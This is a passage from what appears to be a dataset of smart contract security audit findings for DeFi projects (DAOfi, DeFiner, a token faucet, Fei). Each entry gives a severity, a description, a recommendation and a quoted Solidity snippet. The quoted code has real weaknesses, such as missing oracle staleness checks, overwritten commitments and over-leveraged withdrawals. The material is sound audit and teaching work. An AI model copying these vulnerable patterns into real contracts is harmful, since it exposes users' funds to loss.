(reserveQuote > 0) {\\n // set initial supply from reserveQuote\\n supply = amountBaseOut = getBaseOut(reserveQuote);\\n if (amountBaseOut > 0) {\\n \\_safeTransfer(baseToken, to, amountBaseOut);\\n reserveBase = reserveBase.sub(amountBaseOut);\\n }\\n }\\n emit Deposit(msg.sender, reserveBase, reserveQuote, amountBaseOut, to);\\n}\\n```\\n -Restricting DAOfiV1Pair functions to calls from router makes DAOfiV1Router01 security criticalчmediumчThe `DAOfiV1Pair` functions `deposit()`, `withdraw()`, and `swap()` are all restricted to calls from the router in order to avoid losses from user error. However, this means that any unidentified issue in the Router could render all pair contracts unusable, potentially locking the pair owner's funds.\\nAdditionally, `DAOfiV1Factory.createPair()` allows any nonzero address to be provided as the `router`, so pairs can be initialized with a malicious `router` that users would be forced to interact with to utilize the pair contract.\\n```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n```\\n\\n```\\nfunction withdraw(address to) external override lock returns (uint256 amountBase, uint256 amountQuote) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_WITHDRAW');\\n```\\n\\n```\\nfunction swap(address tokenIn, address tokenOut, uint256 amountIn, uint256 amountOut, address to) external override lock {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_SWAP');\\n```\\nчDo not restrict `DAOfiV1Pair` functions to calls from `router`, but encourage users to use a trusted `router` to avoid losses from user error. If this restriction is kept, consider including the `router` address in the deployment salt for the pair or hardcoding the address of a trusted `router` in `DAOfiV1Factory` instead of taking the `router` as a parameter to `createPair()`.чч```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n```\\n -Pair contracts can be easily blockedчlowчThe parameters used to define a unique pair are the `baseToken`, `quoteToken`, `slopeNumerator`, `n`, and `fee`. There is only one accepted value for `n`, and there are eleven accepted values for `fee`. This makes the number of possible “interesting” pools for each token pair somewhat limited, and pools can be easily blocked by front-running deployments and depositing zero liquidity or immediately withdrawing deposited liquidity. Because liquidity can only be added once, these pools are permanently blocked.\\nThe existing mitigation for this issue is to create a new pool with slightly different parameters. This creates significant cost for the creator of a pair, forces them to deploy a pair with sub-optimal parameters, and could potentially block all interesting pools for a token pair.\\nThe salt used to determine unique pair contracts in DAOfiV1Factory.createPair():\\n```\\nrequire(getPair(baseToken, quoteToken, slopeNumerator, n, fee) == address(0), 'DAOfiV1: PAIR\\_EXISTS'); // single check is sufficient\\nbytes memory bytecode = type(DAOfiV1Pair).creationCode;\\nbytes32 salt = keccak256(abi.encodePacked(baseToken, quoteToken, slopeNumerator, n, fee));\\nassembly {\\n pair := create2(0, add(bytecode, 32), mload(bytecode), salt)\\n}\\nIDAOfiV1Pair(pair).initialize(router, baseToken, quoteToken, pairOwner, slopeNumerator, n, fee);\\npairs[salt] = pair;\\n```\\nчConsider adding additional parameters to the salt that defines a unique pair, such as the `pairOwner`. Modifying the parameters included in the salt can also be used to partially mitigate other security concerns raised in this report.чч```\\nrequire(getPair(baseToken, quoteToken, slopeNumerator, n, fee) == address(0), 'DAOfiV1: PAIR\\_EXISTS'); // single check is sufficient\\nbytes memory bytecode = type(DAOfiV1Pair).creationCode;\\nbytes32 salt = keccak256(abi.encodePacked(baseToken, quoteToken, slopeNumerator, n, fee));\\nassembly {\\n pair := create2(0, add(bytecode, 32), mload(bytecode), salt)\\n}\\nIDAOfiV1Pair(pair).initialize(router, baseToken, quoteToken, pairOwner, slopeNumerator, n, fee);\\npairs[salt] = pair;\\n```\\n -DAOfiV1Router01.removeLiquidityETH() does not support tokens with no return valueчlowчWhile the rest of the system uses the `safeTransfer*` pattern, allowing tokens that do not return a boolean value on `transfer()` or `transferFrom()`, `DAOfiV1Router01.removeLiquidityETH()` throws and consumes all remaining gas if the base token does not return `true`.\\nNote that the deposit in this case can still be withdrawn without unwrapping the Eth using `removeLiquidity()`.\\n```\\nfunction removeLiquidityETH(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint amountToken, uint amountETH) {\\n IDAOfiV1Pair pair = IDAOfiV1Pair(DAOfiV1Library.pairFor(factory, lp.tokenBase, WETH, lp.slopeNumerator, lp.n, lp.fee));\\n require(msg.sender == pair.pairOwner(), 'DAOfiV1Router: FORBIDDEN');\\n (amountToken, amountETH) = pair.withdraw(address(this));\\n assert(IERC20(lp.tokenBase).transfer(lp.to, amountToken));\\n IWETH10(WETH).withdraw(amountETH);\\n TransferHelper.safeTransferETH(lp.to, amountETH);\\n}\\n```\\nчBe consistent with the use of `safeTransfer*`, and do not use `assert()` in cases where the condition can be false.чч```\\nfunction removeLiquidityETH(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint amountToken, uint amountETH) {\\n IDAOfiV1Pair pair = IDAOfiV1Pair(DAOfiV1Library.pairFor(factory, lp.tokenBase, WETH, lp.slopeNumerator, lp.n, lp.fee));\\n require(msg.sender == pair.pairOwner(), 'DAOfiV1Router: FORBIDDEN');\\n (amountToken, amountETH) = pair.withdraw(address(this));\\n assert(IERC20(lp.tokenBase).transfer(lp.to, amountToken));\\n IWETH10(WETH).withdraw(amountETH);\\n TransferHelper.safeTransferETH(lp.to, amountETH);\\n}\\n```\\n -Users can withdraw their funds immediately when they are over-leveragedчhighч`Accounts.withdraw` makes two checks before processing a withdrawal.\\nFirst, the method checks that the amount requested for withdrawal is not larger than the user's balance for the asset in question:\\n```\\nfunction withdraw(address \\_accountAddr, address \\_token, uint256 \\_amount) external onlyAuthorized returns(uint256) {\\n\\n // Check if withdraw amount is less than user's balance\\n require(\\_amount <= getDepositBalanceCurrent(\\_token, \\_accountAddr), \"Insufficient balance.\");\\n uint256 borrowLTV = globalConfig.tokenInfoRegistry().getBorrowLTV(\\_token);\\n```\\n\\nSecond, the method checks that the withdrawal will not over-leverage the user. The amount to be withdrawn is subtracted from the user's current “borrow power” at the current price. If the user's total value borrowed exceeds this new borrow power, the method fails, as the user no longer has sufficient collateral to support their borrow positions. However, this `require` is only checked if a user is not already over-leveraged:\\n```\\n// This if condition is to deal with the withdraw of collateral token in liquidation.\\n// As the amount if borrowed asset is already large than the borrow power, we don't\\n// have to check the condition here.\\nif(getBorrowETH(\\_accountAddr) <= getBorrowPower(\\_accountAddr))\\n require(\\n getBorrowETH(\\_accountAddr) <= getBorrowPower(\\_accountAddr).sub(\\n \\_amount.mul(globalConfig.tokenInfoRegistry().priceFromAddress(\\_token))\\n .mul(borrowLTV).div(Utils.getDivisor(address(globalConfig), \\_token)).div(100)\\n ), \"Insufficient collateral when withdraw.\");\\n```\\n\\nIf the user has already borrowed more than their “borrow power” allows, they are allowed to withdraw regardless. This case may arise in several circumstances; the most common being price fluctuation.чDisallow withdrawals if the user is already over-leveraged.\\nFrom the comment included in the code sample above, this condition is included to support the `liquidate` method, but its inclusion creates an attack vector that may allow users to withdraw when they should not be able to do so. Consider adding an additional method to support `liquidate`, so that users may not exit without repaying debts.чч```\\nfunction withdraw(address \\_accountAddr, address \\_token, uint256 \\_amount) external onlyAuthorized returns(uint256) {\\n\\n // Check if withdraw amount is less than user's balance\\n require(\\_amount <= getDepositBalanceCurrent(\\_token, \\_accountAddr), \"Insufficient balance.\");\\n uint256 borrowLTV = globalConfig.tokenInfoRegistry().getBorrowLTV(\\_token);\\n```\\n -Users can borrow funds, deposit them, then borrow more Won't FixчhighчUsers may deposit and borrow funds denominated in any asset supported by the `TokenRegistry`. Each time a user deposits or borrows a token, they earn FIN according to the difference in deposit / borrow rate indices maintained by `Bank`.\\nBorrowing funds\\nWhen users borrow funds, they may only borrow up to a certain amount: the user's “borrow power.” As long as the user is not requesting to borrow an amount that would cause their resulting borrowed asset value to exceed their available borrow power, the borrow is successful and the user receives the assets immediately. A user's borrow power is calculated in the following function:\\n```\\n/\\*\\*\\n \\* Calculate an account's borrow power based on token's LTV\\n \\*/\\nfunction getBorrowPower(address \\_borrower) public view returns (uint256 power) {\\n for(uint8 i = 0; i < globalConfig.tokenInfoRegistry().getCoinLength(); i++) {\\n if (isUserHasDeposits(\\_borrower, i)) {\\n address token = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(token != ETH\\_ADDR) {\\n divisor = 10\\*\\*uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(token));\\n }\\n // globalConfig.bank().newRateIndexCheckpoint(token);\\n power = power.add(getDepositBalanceCurrent(token, \\_borrower)\\n .mul(globalConfig.tokenInfoRegistry().priceFromIndex(i))\\n .mul(globalConfig.tokenInfoRegistry().getBorrowLTV(token)).div(100)\\n .div(divisor)\\n );\\n }\\n }\\n return power;\\n}\\n```\\n\\nFor each asset, borrow power is calculated from the user's deposit size, multiplied by the current chainlink price, multiplied and that asset's “borrow LTV.”\\nDepositing borrowed funds\\nAfter a user borrows tokens, they can then deposit those tokens, increasing their deposit balance for that asset. As a result, their borrow power increases, which allows the user to borrow again.\\nBy continuing to borrow, deposit, and borrow again, the user can repeatedly borrow assets. Essentially, this creates positions for the user where the collateral for their massive borrow position is entirely made up of borrowed assets.\\nConclusion\\nThere are several potential side-effects of this behavior.\\nFirst, as described in https://github.com/ConsenSys/definer-audit-2021-02/issues/3, the system is comprised of many different tokens, each of which is subject to price fluctuation. By borrowing and depositing repeatedly, a user may establish positions across all supported tokens. At this point, if price fluctuations cause the user's account to cross the liquidation threshold, their positions can be liquidated.\\nLiquidation is a complicated function of the protocol, but in essence, the liquidator purchases a target's collateral at a discount, and the resulting sale balances the account somewhat. However, when a user repeatedly deposits borrowed tokens, their collateral is made up of borrowed tokens: the system's liquidity! As a result, this may allow an attacker to intentionally create a massively over-leveraged account on purpose, liquidate it, and exit with a chunk of the system liquidity.\\nAnother potential problem with this behavior is FIN token mining. When users borrow and deposit, they earn FIN according to the size of the deposit / borrow, and the difference in deposit / borrow rate indices since the last deposit / borrow. By repeatedly depositing / borrowing, users are able to artificially deposit and borrow far more often than normal, which may allow them to generate FIN tokens at will. This additional strategy may make attacks like the one described above much more economically feasible.чDue to the limited time available during this engagement, these possibilities and potential mitigations were not fully explored. Definer is encouraged to investigate this behavior more carefully.чч```\\n/\\*\\*\\n \\* Calculate an account's borrow power based on token's LTV\\n \\*/\\nfunction getBorrowPower(address \\_borrower) public view returns (uint256 power) {\\n for(uint8 i = 0; i < globalConfig.tokenInfoRegistry().getCoinLength(); i++) {\\n if (isUserHasDeposits(\\_borrower, i)) {\\n address token = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(token != ETH\\_ADDR) {\\n divisor = 10\\*\\*uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(token));\\n }\\n // globalConfig.bank().newRateIndexCheckpoint(token);\\n power = power.add(getDepositBalanceCurrent(token, \\_borrower)\\n .mul(globalConfig.tokenInfoRegistry().priceFromIndex(i))\\n .mul(globalConfig.tokenInfoRegistry().getBorrowLTV(token)).div(100)\\n .div(divisor)\\n );\\n }\\n }\\n return power;\\n}\\n```\\n -Stale Oracle prices might affect the ratesчhighчIt's possible that due to network congestion or other reasons, the price that the ChainLink oracle returns is old and not up to date. This is more extreme in lesser known tokens that have fewer ChainLink Price feeds to update the price frequently. The codebase as is, relies on `chainLink().getLatestAnswer()` and does not check the timestamp of the price.\\n```\\n function priceFromAddress(address tokenAddress) public view returns(uint256) {\\n if(Utils.\\_isETH(address(globalConfig), tokenAddress)) {\\n return 1e18;\\n }\\n return uint256(globalConfig.chainLink().getLatestAnswer(tokenAddress));\\n }\\n```\\nчDo a sanity check on the price returned from the oracle. If the price is older than a threshold, revert or handle in other means.чч```\\n function priceFromAddress(address tokenAddress) public view returns(uint256) {\\n if(Utils.\\_isETH(address(globalConfig), tokenAddress)) {\\n return 1e18;\\n }\\n return uint256(globalConfig.chainLink().getLatestAnswer(tokenAddress));\\n }\\n```\\n -Overcomplicated unit conversionsчmediumчThere are many instances of unit conversion in the system that are implemented in a confusing way. This could result in mistakes in the conversion and possibly failure in correct accounting. It's been seen in the ecosystem that these type of complicated unit conversions could result in calculation mistake and loss of funds.\\nHere are a few examples:\\n```\\n function getBorrowRatePerBlock(address \\_token) public view returns(uint) {\\n if(!globalConfig.tokenInfoRegistry().isSupportedOnCompound(\\_token))\\n // If the token is NOT supported by the third party, borrowing rate = 3% + U \\* 15%.\\n return getCapitalUtilizationRatio(\\_token).mul(globalConfig.rateCurveSlope()).div(INT\\_UNIT).add(globalConfig.rateCurveConstant()).div(BLOCKS\\_PER\\_YEAR);\\n\\n // if the token is suppored in third party, borrowing rate = Compound Supply Rate \\* 0.4 + Compound Borrow Rate \\* 0.6\\n return (compoundPool[\\_token].depositRatePerBlock).mul(globalConfig.compoundSupplyRateWeights()).\\n add((compoundPool[\\_token].borrowRatePerBlock).mul(globalConfig.compoundBorrowRateWeights())).div(10);\\n }\\n```\\n\\n```\\n compoundPool[\\_token].depositRatePerBlock = cTokenExchangeRate.mul(UNIT).div(lastCTokenExchangeRate[cToken])\\n .sub(UNIT).div(blockNumber.sub(lastCheckpoint[\\_token]));\\n```\\n\\n```\\n return lastDepositeRateIndex.mul(getBlockNumber().sub(lcp).mul(depositRatePerBlock).add(INT\\_UNIT)).div(INT\\_UNIT);\\n```\\nчSimplify the unit conversions in the system. This can be done either by using a function wrapper for units to convert all values to the same unit before including them in any calculation or by better documenting every line of unit conversionчч```\\n function getBorrowRatePerBlock(address \\_token) public view returns(uint) {\\n if(!globalConfig.tokenInfoRegistry().isSupportedOnCompound(\\_token))\\n // If the token is NOT supported by the third party, borrowing rate = 3% + U \\* 15%.\\n return getCapitalUtilizationRatio(\\_token).mul(globalConfig.rateCurveSlope()).div(INT\\_UNIT).add(globalConfig.rateCurveConstant()).div(BLOCKS\\_PER\\_YEAR);\\n\\n // if the token is suppored in third party, borrowing rate = Compound Supply Rate \\* 0.4 + Compound Borrow Rate \\* 0.6\\n return (compoundPool[\\_token].depositRatePerBlock).mul(globalConfig.compoundSupplyRateWeights()).\\n add((compoundPool[\\_token].borrowRatePerBlock).mul(globalConfig.compoundBorrowRateWeights())).div(10);\\n }\\n```\\n -Commented out code in the codebaseчmediumчThere are many instances of code lines (and functions) that are commented out in the code base. Having commented out code increases the cognitive load on an already complex system. Also, it hides the important parts of the system that should get the proper attention, but that attention gets to be diluted.\\nThe main problem is that commented code adds confusion with no real benefit. Code should be code, and comments should be comments.\\nHere's a few examples of such lines of code, note that there are more.\\n```\\n struct LiquidationVars {\\n // address token;\\n // uint256 tokenPrice;\\n // uint256 coinValue;\\n uint256 borrowerCollateralValue;\\n // uint256 tokenAmount;\\n // uint256 tokenDivisor;\\n uint256 msgTotalBorrow;\\n```\\n\\n```\\n if(token != ETH\\_ADDR) {\\n divisor = 10\\*\\*uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(token));\\n }\\n // globalConfig.bank().newRateIndexCheckpoint(token);\\n power = power.add(getDepositBalanceCurrent(token, \\_borrower)\\n```\\n\\nMany usage of `console.log()` and also the commented import on most of the contracts\\n```\\n // require(\\n // totalBorrow.mul(100) <= totalCollateral.mul(liquidationDiscountRatio),\\n // \"Collateral is not sufficient to be liquidated.\"\\n // );\\n```\\n\\n```\\n // function \\_isETH(address \\_token) public view returns (bool) {\\n // return globalConfig.constants().ETH\\_ADDR() == \\_token;\\n // }\\n\\n // function getDivisor(address \\_token) public view returns (uint256) {\\n // if(\\_isETH(\\_token)) return INT\\_UNIT;\\n // return 10 \\*\\* uint256(getTokenDecimals(\\_token));\\n // }\\n```\\n\\n```\\n // require(\\_borrowLTV != 0, \"Borrow LTV is zero\");\\n require(\\_borrowLTV < SCALE, \"Borrow LTV must be less than Scale\");\\n // require(liquidationThreshold > \\_borrowLTV, \"Liquidation threshold must be greater than Borrow LTV\");\\n```\\nчIn many of the above examples, it's not clear if the commented code is for testing or obsolete code (e.g. in the last example, can _borrowLTV ==0?) . All these instances should be reviewed and the system should be fully tested for all edge cases after the code changes.чч```\\n struct LiquidationVars {\\n // address token;\\n // uint256 tokenPrice;\\n // uint256 coinValue;\\n uint256 borrowerCollateralValue;\\n // uint256 tokenAmount;\\n // uint256 tokenDivisor;\\n uint256 msgTotalBorrow;\\n```\\n -Emergency withdrawal code presentчmediumчCode and functionality for emergency stop and withdrawal is present in this code base.\\n```\\n // ============================================\\n // EMERGENCY WITHDRAWAL FUNCTIONS\\n // Needs to be removed when final version deployed\\n // ============================================\\n function emergencyWithdraw(GlobalConfig globalConfig, address \\_token) public {\\n address cToken = globalConfig.tokenInfoRegistry().getCToken(\\_token);\\n// rest of code\\n```\\n\\n```\\n function emergencyWithdraw(address \\_token) external onlyEmergencyAddress {\\n SavingLib.emergencyWithdraw(globalConfig, \\_token);\\n }\\n```\\n\\n```\\n// rest of code\\n address payable public constant EMERGENCY\\_ADDR = 0xc04158f7dB6F9c9fFbD5593236a1a3D69F92167c;\\n// rest of code\\n```\\nчTo remove the emergency code and fully test all the affected contracts.чч```\\n // ============================================\\n // EMERGENCY WITHDRAWAL FUNCTIONS\\n // Needs to be removed when final version deployed\\n // ============================================\\n function emergencyWithdraw(GlobalConfig globalConfig, address \\_token) public {\\n address cToken = globalConfig.tokenInfoRegistry().getCToken(\\_token);\\n// rest of code\\n```\\n -Accounts contains expensive loopingчmediumч`Accounts.getBorrowETH` performs multiple external calls to `GlobalConfig` and `TokenRegistry` within a for loop:\\n```\\nfunction getBorrowETH(\\n address \\_accountAddr\\n) public view returns (uint256 borrowETH) {\\n uint tokenNum = globalConfig.tokenInfoRegistry().getCoinLength();\\n //console.log(\"tokenNum\", tokenNum);\\n for(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n address tokenAddress = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(tokenAddress != ETH\\_ADDR) {\\n divisor = 10 \\*\\* uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(tokenAddress));\\n }\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(globalConfig.tokenInfoRegistry().priceFromIndex(i)).div(divisor));\\n }\\n }\\n return borrowETH;\\n}\\n```\\n\\nThe loop also makes additional external calls and delegatecalls from:\\nTokenRegistry.priceFromIndex:\\n```\\nfunction priceFromIndex(uint index) public view returns(uint256) {\\n require(index < tokens.length, \"coinIndex must be smaller than the coins length.\");\\n address tokenAddress = tokens[index];\\n // Temp fix\\n if(Utils.\\_isETH(address(globalConfig), tokenAddress)) {\\n return 1e18;\\n }\\n return uint256(globalConfig.chainLink().getLatestAnswer(tokenAddress));\\n}\\n```\\n\\nAccounts.getBorrowBalanceCurrent:\\n```\\nfunction getBorrowBalanceCurrent(\\n address \\_token,\\n address \\_accountAddr\\n) public view returns (uint256 borrowBalance) {\\n AccountTokenLib.TokenInfo storage tokenInfo = accounts[\\_accountAddr].tokenInfos[\\_token];\\n uint accruedRate;\\n if(tokenInfo.getBorrowPrincipal() == 0) {\\n return 0;\\n } else {\\n if(globalConfig.bank().borrowRateIndex(\\_token, tokenInfo.getLastBorrowBlock()) == 0) {\\n accruedRate = INT\\_UNIT;\\n } else {\\n accruedRate = globalConfig.bank().borrowRateIndexNow(\\_token)\\n .mul(INT\\_UNIT)\\n .div(globalConfig.bank().borrowRateIndex(\\_token, tokenInfo.getLastBorrowBlock()));\\n }\\n return tokenInfo.getBorrowBalance(accruedRate);\\n }\\n}\\n```\\n\\nIn a worst case scenario, each iteration may perform a maximum of 25+ calls/delegatecalls. Assuming a maximum `tokenNum` of 128 (TokenRegistry.MAX_TOKENS), the gas cost for this method may reach upwards of 2 million for external calls alone.\\nGiven that this figure would only be a portion of the total transaction gas cost, `getBorrowETH` may represent a DoS risk within the `Accounts` contract.чAvoid for loops unless absolutely necessary\\nWhere possible, consolidate multiple subsequent calls to the same contract to a single call, and store the results of calls in local variables for re-use. For example,\\nInstead of this:\\n```\\nuint tokenNum = globalConfig.tokenInfoRegistry().getCoinLength();\\nfor(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n address tokenAddress = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(tokenAddress != ETH\\_ADDR) {\\n divisor = 10 \\*\\* uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(tokenAddress));\\n }\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(globalConfig.tokenInfoRegistry().priceFromIndex(i)).div(divisor));\\n }\\n}\\n```\\n\\nModify `TokenRegistry` to support a single call, and cache intermediate results like this:\\n```\\nTokenRegistry registry = globalConfig.tokenInfoRegistry();\\nuint tokenNum = registry.getCoinLength();\\nfor(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n // here, getPriceFromIndex(i) performs all of the steps as the code above, but with only 1 ext call\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(registry.getPriceFromIndex(i)).div(divisor));\\n }\\n}\\n```\\nчч```\\nfunction getBorrowETH(\\n address \\_accountAddr\\n) public view returns (uint256 borrowETH) {\\n uint tokenNum = globalConfig.tokenInfoRegistry().getCoinLength();\\n //console.log(\"tokenNum\", tokenNum);\\n for(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n address tokenAddress = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(tokenAddress != ETH\\_ADDR) {\\n divisor = 10 \\*\\* uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(tokenAddress));\\n }\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(globalConfig.tokenInfoRegistry().priceFromIndex(i)).div(divisor));\\n }\\n }\\n return borrowETH;\\n}\\n```\\n -Naming inconsistencyчlowчThere are some inconsistencies in the naming of some functions with what they do.\\n```\\n function getCoinLength() public view returns (uint256 length) { //@audit-info coin vs token\\n return tokens.length;\\n }\\n```\\nчReview the code for the naming inconsistencies.чч```\\n function getCoinLength() public view returns (uint256 length) { //@audit-info coin vs token\\n return tokens.length;\\n }\\n```\\n -TokenFaucet refill can have an unexpected outcomeчmediumчThe `TokenFaucet` contract can only disburse tokens to the users if it has enough balance. When the contract is running out of tokens, it stops dripping.\\n```\\nuint256 assetTotalSupply = asset.balanceOf(address(this));\\nuint256 availableTotalSupply = assetTotalSupply.sub(totalUnclaimed);\\nuint256 newSeconds = currentTimestamp.sub(lastDripTimestamp);\\nuint256 nextExchangeRateMantissa = exchangeRateMantissa;\\nuint256 newTokens;\\nuint256 measureTotalSupply = measure.totalSupply();\\n\\nif (measureTotalSupply > 0 && availableTotalSupply > 0 && newSeconds > 0) {\\n newTokens = newSeconds.mul(dripRatePerSecond);\\n if (newTokens > availableTotalSupply) {\\n newTokens = availableTotalSupply;\\n }\\n uint256 indexDeltaMantissa = measureTotalSupply > 0 ? FixedPoint.calculateMantissa(newTokens, measureTotalSupply) : 0;\\n nextExchangeRateMantissa = nextExchangeRateMantissa.add(indexDeltaMantissa);\\n\\n emit Dripped(\\n newTokens\\n );\\n}\\n```\\n\\nThe owners of the faucet can decide to refill the contract so it can disburse tokens again. If there's been a lot of time since the faucet was drained, the `lastDripTimestamp` value can be far behind the `currentTimestamp`. In that case, the users can instantly withdraw some amount (up to all the balance) right after the refill.чTo avoid uncertainty, it's essential to call the `drip` function before the refill. If this call is made in a separate transaction, the owner should make sure that this transaction was successfully mined before sending tokens for the refill.чч```\\nuint256 assetTotalSupply = asset.balanceOf(address(this));\\nuint256 availableTotalSupply = assetTotalSupply.sub(totalUnclaimed);\\nuint256 newSeconds = currentTimestamp.sub(lastDripTimestamp);\\nuint256 nextExchangeRateMantissa = exchangeRateMantissa;\\nuint256 newTokens;\\nuint256 measureTotalSupply = measure.totalSupply();\\n\\nif (measureTotalSupply > 0 && availableTotalSupply > 0 && newSeconds > 0) {\\n newTokens = newSeconds.mul(dripRatePerSecond);\\n if (newTokens > availableTotalSupply) {\\n newTokens = availableTotalSupply;\\n }\\n uint256 indexDeltaMantissa = measureTotalSupply > 0 ? FixedPoint.calculateMantissa(newTokens, measureTotalSupply) : 0;\\n nextExchangeRateMantissa = nextExchangeRateMantissa.add(indexDeltaMantissa);\\n\\n emit Dripped(\\n newTokens\\n );\\n}\\n```\\n -Gas Optimization on transfersчlowчIn TokenFaucet, on every transfer `_captureNewTokensForUser` is called twice. This function does a few calculations and writes the latest UserState to the storage. However, if `lastExchangeRateMantissa == exchangeRateMantissa`, or in other words, two transfers happen in the same block, there are no changes in the newToken amounts, so there is an extra storage store with the same values.\\n`deltaExchangeRateMantissa` will be 0 in case two transfers ( no matter from or to) are in the same block for a user.\\n```\\n uint256 deltaExchangeRateMantissa = uint256(exchangeRateMantissa).sub(userState.lastExchangeRateMantissa);\\n uint128 newTokens = FixedPoint.multiplyUintByMantissa(userMeasureBalance, deltaExchangeRateMantissa).toUint128();\\n userStates[user] = UserState({\\n lastExchangeRateMantissa: exchangeRateMantissa,\\n balance: uint256(userState.balance).add(newTokens).toUint128()\\n });\\n```\\nчReturn without storage update if `lastExchangeRateMantissa == exchangeRateMantissa`, or by another method if `deltaExchangeRateMantissa == 0`. This reduces the gas cost for active users (high number of transfers that might be in the same block)чч```\\n uint256 deltaExchangeRateMantissa = uint256(exchangeRateMantissa).sub(userState.lastExchangeRateMantissa);\\n uint128 newTokens = FixedPoint.multiplyUintByMantissa(userMeasureBalance, deltaExchangeRateMantissa).toUint128();\\n userStates[user] = UserState({\\n lastExchangeRateMantissa: exchangeRateMantissa,\\n balance: uint256(userState.balance).add(newTokens).toUint128()\\n });\\n```\\n -Handle transfer tokens where from == toчlowчIn TokenFaucet, when calling `beforeTokenTransfer` it should also be optimized when `to == from`. This is to prevent any possible issues with internal accounting and token drip calculations.\\n```\\n// rest of code\\n if (token == address(measure) && from != address(0)) { //add && from != to\\n drip();\\n// rest of code\\n```\\nчAs ERC20 standard, `from == to` can be allowed but check in `beforeTokenTransfer` that if `to == from`, then do not call `_captureNewTokensForUser(from);` again.чч```\\n// rest of code\\n if (token == address(measure) && from != address(0)) { //add && from != to\\n drip();\\n// rest of code\\n```\\n -Redundant/Duplicate checksчlowчThere are a few checks (require) in TokenFaucet that are redundant and/or checked twice.\\n```\\n require(\\_dripRatePerSecond > 0, \"TokenFaucet/dripRate-gt-zero\");\\n asset = \\_asset;\\n measure = \\_measure;\\n setDripRatePerSecond(\\_dripRatePerSecond);\\n```\\n\\n```\\n function setDripRatePerSecond(uint256 \\_dripRatePerSecond) public onlyOwner {\\n require(\\_dripRatePerSecond > 0, \"TokenFaucet/dripRate-gt-zero\");\\n```\\n\\n\\n```\\n function drip() public returns (uint256) {\\n uint256 currentTimestamp = \\_currentTime();\\n\\n // this should only run once per block.\\n if (lastDripTimestamp == uint32(currentTimestamp)) {\\n return 0;\\n }\\n// rest of code\\n uint256 newSeconds = currentTimestamp.sub(lastDripTimestamp);\\n// rest of code\\n if (measureTotalSupply > 0 && availableTotalSupply > 0 && newSeconds > 0) {\\n// rest of code\\n uint256 indexDeltaMantissa = measureTotalSupply > 0 ? FixedPoint.calculateMantissa(newTokens, measureTotalSupply) : 0; \\n```\\nчRemove the redundant checks to reduce the code size and complexity.чч```\\n require(\\_dripRatePerSecond > 0, \"TokenFaucet/dripRate-gt-zero\");\\n asset = \\_asset;\\n measure = \\_measure;\\n setDripRatePerSecond(\\_dripRatePerSecond);\\n```\\n -GenesisGroup.commit overwrites previously-committed valuesчhighч`commit` allows anyone to `commit` purchased FGEN to a swap that will occur once the genesis group is launched. This commitment may be performed on behalf of other users, as long as the calling account has sufficient allowance:\\n```\\nfunction commit(address from, address to, uint amount) external override onlyGenesisPeriod {\\n burnFrom(from, amount);\\n\\n committedFGEN[to] = amount;\\n totalCommittedFGEN += amount;\\n\\n emit Commit(from, to, amount);\\n}\\n```\\n\\nThe `amount` stored in the recipient's `committedFGEN` balance overwrites any previously-committed value. Additionally, this also allows anyone to commit an `amount` of “0” to any account, deleting their commitment entirely.чEnsure the committed amount is added to the existing commitment.чч```\\nfunction commit(address from, address to, uint amount) external override onlyGenesisPeriod {\\n burnFrom(from, amount);\\n\\n committedFGEN[to] = amount;\\n totalCommittedFGEN += amount;\\n\\n emit Commit(from, to, amount);\\n}\\n```\\n -UniswapIncentive overflow on pre-transfer hooksчhighчBefore a token transfer is performed, `Fei` performs some combination of mint/burn operations via UniswapIncentive.incentivize:\\n```\\nfunction incentivize(\\n address sender,\\n address receiver, \\n address operator,\\n uint amountIn\\n) external override onlyFei {\\n updateOracle();\\n\\n if (isPair(sender)) {\\n incentivizeBuy(receiver, amountIn);\\n }\\n\\n if (isPair(receiver)) {\\n require(isSellAllowlisted(sender) || isSellAllowlisted(operator), \"UniswapIncentive: Blocked Fei sender or operator\");\\n incentivizeSell(sender, amountIn);\\n }\\n}\\n```\\n\\nBoth `incentivizeBuy` and `incentivizeSell` calculate buy/sell incentives using overflow-prone math, then mint / burn from the target according to the results. This may have unintended consequences, like allowing a caller to mint tokens before transferring them, or burn tokens from their recipient.\\n`incentivizeBuy` calls `getBuyIncentive` to calculate the final minted value:\\n```\\nfunction incentivizeBuy(address target, uint amountIn) internal ifMinterSelf {\\n if (isExemptAddress(target)) {\\n return;\\n }\\n\\n (uint incentive, uint32 weight,\\n Decimal.D256 memory initialDeviation,\\n Decimal.D256 memory finalDeviation) = getBuyIncentive(amountIn);\\n\\n 